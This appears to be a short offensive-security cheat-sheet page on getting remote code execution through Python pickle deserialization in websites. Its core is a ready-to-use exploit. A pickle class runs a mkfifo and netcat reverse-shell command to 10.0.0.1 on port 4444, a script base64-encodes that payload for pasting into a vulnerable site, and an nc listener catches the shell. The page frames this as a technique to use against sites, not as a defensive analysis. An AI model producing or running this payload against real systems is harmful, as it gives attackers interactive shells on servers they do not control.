Python Pickle RCE

The python “pickle” module, that serializes and deserializes a Python object, is vulnerable to remote code execution. If the website uses this module, we may be able to execute arbitrary code.
tags: - - https://davidhamann.de/2020/04/05/exploiting-python-pickle/ date: 2023-08-10 draft: false


Exploitation

Below is the Python script (mypickle.py) to generate the payload to reverse shell.

import pickle
import base64
import os

class RCE:
    def __reduce__(self):
        cmd = ('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 4444 > /tmp/f')
        return os.system, (cmd,)

if __name__ == '__main__':
    pickled = pickle.dumps(RCE())
    print(base64.b64encode(pickled))
    # or
    print(base64.urlsafe_b64encode(pickled))

Now run this script to generate the Base64 payload.

python3 mypickle.py

Copy the ourput base64 string and paste it to where the payload affects in website.
Before reloading the web page, start a listener in local machine.

nc -lvnp 4444

Then reload the page. We should get a shell in local terminal.